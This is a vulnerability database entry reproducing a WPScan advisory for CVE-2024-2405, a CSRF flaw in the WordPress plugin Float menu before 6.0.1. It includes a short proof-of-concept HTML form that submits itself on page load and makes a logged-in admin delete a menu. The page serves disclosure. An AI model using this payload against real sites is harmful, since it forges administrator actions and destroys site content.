Lucene search
Erwan LR (WPScan)WPEX-ID:C42FFA15-6EBE-4C70-9E51-B95BD05EA04DHistoryApr 11, 2024 - 12:00 a.m.
Float menu < 6.0.1 - Menu Deletion via CSRF
2024-04-1100:00:00
Erwan LR (WPScan)
34
float menu
version 6.0.1
csrf
exploit
poc
april 25
2024
Description The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.
Make a logged in admin open one a page with the code below, this will make them delete the menu with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=float-menu&action=delete-items&action2=delete-items" method="POST">
<input type="text" name="ID" value="1"/>
<input type="submit" value="submit">
</form>
</body>Related
cvelist
cvelist
CVE-2024-2405 Float menu < 6.0.1 - Menu Deletion via CSRF
2024-05-02 06:00:02
wpvulndb
wpvulndb
Float menu < 6.0.1 - Menu Deletion via CSRF
2024-04-11 00:00:00
nvd
nvd
CVE-2024-2405
2024-05-02 06:15:49
vulnrichment
vulnrichment
CVE-2024-2405 Float menu < 6.0.1 - Menu Deletion via CSRF
2024-05-02 06:00:02
cve
cve
CVE-2024-2405
2024-05-02 06:15:49
wordfence
wordfence
AI Score
6.8
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:C42FFA15-6EBE-4C70-9E51-B95BD05EA04D